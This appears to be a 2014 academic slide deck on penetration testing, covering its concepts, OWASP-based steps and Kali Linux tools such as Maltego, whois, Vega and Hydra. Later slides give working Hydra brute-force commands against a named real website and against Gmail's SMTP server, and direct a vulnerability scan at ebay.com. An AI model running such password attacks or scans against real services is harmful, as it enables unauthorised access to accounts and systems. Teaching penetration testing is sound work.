Penetration Testing

Presented by: Elham Hojati

Advisor: Dr. Akbar Namin
July 2014
 Part one:
the concept of
penetration testing

2
 What is a penetration test?(informal)

Port scanning
Vulnerability Scanning
Penetration Testing

3
 What is a penetration test?

A penetration test is an attack on a computer system, network or Web

application to find vulnerabilities that an attacker could exploit with the
intention of finding security weaknesses, potentially gaining access to it, its
functionality and data.
Pen tests can be automated with software applications or they can be
performed manually.
The process includes:
gathering information about the target before the test (reconnaissance),
identifying possible entry points(Port scanning),
attempting to break in (either virtually or for real)
reporting back the findings.

4
 Why conduct a penetration test?
Prevent data breach

Test your security controls

Ensure system security

Get a baseline

Compliance

5
 Steps of penetration test (informal)
Establish goal
Information gathering
Reconnaissance
Discovery
Port scanning
Vulnerability scanning
Vulnerability analysis
Taking control
Exploitation
Brute forcing
Social engineering
Pivoting
Reporting
Evidence collection
Risk analysis
Remediation
6
 Some Considerations

Scope
Internal or external
In-house or outsourced
Selecting a pen-tester (white hat hacker)
White hat hacker vs Black hat hacker

Penetration tests are sometimes called white hat attacks because in a pen test, the good
guys are attempting to break in. The term "white hat" in Internet slang refers to an ethical
computer hacker, or a computer security expert, who specializes in penetration testing
and in other testing methodologies to ensure the security of an organization's information
systems

7
 Steps of penetration test
12 subcategories of the Web Application Penetration Testing
Methodology: based on OWASP methodology
1.Introduction and Objectives
2.Information Gathering
3.Configuration and Deploy Management Testing
4.Identity Management Testing
5.Authentication Testing
6.Authorization Testing
7.Session Management Testing
8.Data Validation Testing
9.Error Handling
10.Cryptography
11.Business Logic Testing
12.Client Side Testing

8
Steps of network penetration test

9
 Steps of penetration test

Step 1: Introduction and Objectives

Step 2:Information gathering

Step 3:Vulnerability analysis

Step 4:Simulation (Penetrate the system to provide the proof)

Step 5:Risk assessment

Step 6:Recommendations for reduction or recovery and providing the report

10
 Part 2:
Introduction to some
Penetration Testing
Tools

https://drive.google.com/file/d/0B7j6y0yrm70VSmFGV0VtYWpucHM/edit?usp=sharing

pt.isfahanblog.com 11
 Kali Linux

Kali Linux is a Debian-derived Linux distribution, designed for digital forensics

and penetration testing.
Kali Linux is preinstalled with numerous penetration-testing programs.
Kali Linux can be run from a hard disk, live CD, or live USB. It is a supported
platform of the Metasploit Project's Metasploit Framework, a tool for developing
and executing security exploits.
From the creators of BackTrack comes Kali Linux, the most advanced penetration
testing distribution created till now.

12
 Installing Kali Linux
1- Go to the link http://www.kali.org/downloads/
2- Download a proper version of the kali Linux image (based on your system type, if it is
32 bit or 64 bit, for example for 64 bit OS you can download Kali Linux 64 bit ISO (to
find the type of the system: right click on the computer icon in your desktop or in the start
menu and go to the properties tab and read the system type there).
3- Then you can write this ISO file to a cd or DVD or flash memory and use it or you can put
it in the VMware like below.
4- For running Kali Linux in the VMware, go to the start and type VMware Workstation and
open that.
5- Go to the file-> new virtual machine to install the Kali Linux through this wizard.
6- Install the Kali Linux and select it from the list in the left sideof the page and power it on.
7- Type the user name and password (ex. User: root Pass: toor).
8- Go to the application->Kali Linux to see all the penetration testing tools there.

13
 Penetration testing tools

whois: for information gathering step

Maltego: for information gathering step

Hydra: for brute force step

Vega: for Vulnerability analysis

14
 Maltego
Maltego is an open source intelligence and forensics application.
It will offer you gathering of information as well as the representation of this
information in an easy to understand format.

15
 Maltego

1- Go to the Applications -> Kali Linux -> top 10 security tools -> maltego, or open a
command line terminal and type maltego.
2- If it is your first time you want to run this program, you should register to this
program by using an email address and then login to the program using this email
address and the password that you set before.
3- Go to the menu tab (a circle at the top left corner of the page) and select new.
4-from the palette menu (from the left side of the page), select domain and drag and
drop it to the middle of the page.
5- Type the domain name in the property view of the domain (at the right side).
6- Right click on the domain. Choose Run Transform-> all transforms-> to website
DNS
7- Right click on one of the websites and choose Run Transform-> all transforms->
ToServerTechnologiesWebsite.

16
 Maltego
8- Right click on one of the websites and choose Run Transform-> all transforms-> To
IP Address.
9- Right click on one of the IP address and choose Run Transform-> all transforms
->Net block using Whois.
10- Right click on one of the net block and choose Run Transform-> all transforms->
toLocationCountryNetblock.
11- Right click on one of the websites and choose Run Transform-> all transforms->
Mirror: email addresses found

17
 WHOIS SERVICE
WHOIS is a query and response protocol that is widely used for querying
databases that store the registered users of an Internet resource, such as a domain
name, an IP address block, or an autonomous system
It is also used for a wider range of other information.
The protocol stores and delivers database content in a human-readable format.

18
 Using WHOIS SERVICE
1- Open a command line terminal in Kali Linux and type whois <target> for example:
whois google.com
2- Type ping yahoo.com and find the IP address of yahoo.
3-type whois <yahoo IP address>
4- Go to the link http://www.iana.org/whois and type google.com
5- Go to the link http://www.whois.net/ and type www.google.com

19
 Vega
Vega is a free and open source scanner and testing platform to test the security of
web applications.

Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS),
inadvertently disclosed sensitive information, and other vulnerabilities.

It is written in Java, GUI based, and runs on Linux, OS X, and Windows

20
 Vega

1- In the Kali Linux go to the Applications -> Kali Linux -> Web Applications -> web
crawlers -> Vega, or Open a command line terminal in Kali Linux and type vega.
2- Go to the link https://subgraph.com/vega/download/index.en.html to download
Vega.
3- Install the Vega tool and run it.
4- Go to the scan tab -> start new scan.
5- Type http://www.ebay.com/ to find this website vulnerability.

21
Hydra: Brute force Attack

22
 Finding a username and password of
a website
1. Go the the website: http://www.sunstudiophotography.com/
2. Type /hackme at the end of the website URL address (for going to this part of the
site you need to have a username and password).
3. Download a library of usernames and a library of passwords through the internet
or use some tools such as key generator tools to produce a list of username and
password ( now you have 2 files, one of the consists of a list of usernames and the
other one consists of a list of passwords.)
4. Go to the command line terminal and type this:
hydra <website> -L <userlist> -P <wordlist> -V -f http-get /<sub dir>
for example:
hydra www.sunstudiophotography.com -L /root/Desktop/userlist.txt -P
/root/Desktop/wordlist.txt -V -f http-get /hackme
1. You find the username and password of this web site
2. Login to the website using the username: guest and password: password [4]
23
 Hydra-gtk : Finding Gmail password

1- Go to the Applications -> Kali Linux -> Password Attacks -> Online Attacks -> hydra-gtk
2- Set:
In the target tab:
Single Target: smtp.gmail.com
Port: 465
Protocol: smtp
Use SSL should be selected
Show Attempts should be selected
In the passwords tab:
Username: el.sec.test.2014@gmail.com
Password list: browse and choose the password file
Try login as password should be selected.
Click start in the start tab.

24
3- Hydra found gmail password:11111111q
4- Or you can go to the command line terminal and type:
hydra -S -l el.sec.test.2014@gmail.com -P /root/Desktop/pass4.txt -V -s 465
smtp.gmail.com smtp
Or type:
hydra -s 465 -S -V -l el.sec.test.2014@gmail.com -P/root/Desktop/pass4.txt -e s -t
36 -w 36 smtp.gmail.com smtp

25
 References:

[1] http://en.wikipedia.org/wiki/White_hat_%28computer_security%29
[2] https://community.rapid7.com/docs/DOC-2248
[3] http://searchsoftwarequality.techtarget.com/definition/penetration-testing
[4] http://en.wikipedia.org/wiki/Penetration_test
[5] https://www.securitymetrics.com/pentest_steps.adp
[6] http://www.kali.org/
[7] http://en.wikipedia.org/wiki/Kali_Linux
[8] https://www.paterva.com/web6/
[9] http://en.wikipedia.org/wiki/Whois
[10] https://subgraph.com/vega/
[11] http://www.youtube.com/watch?v=plitHS8Tqdo
26
Question

27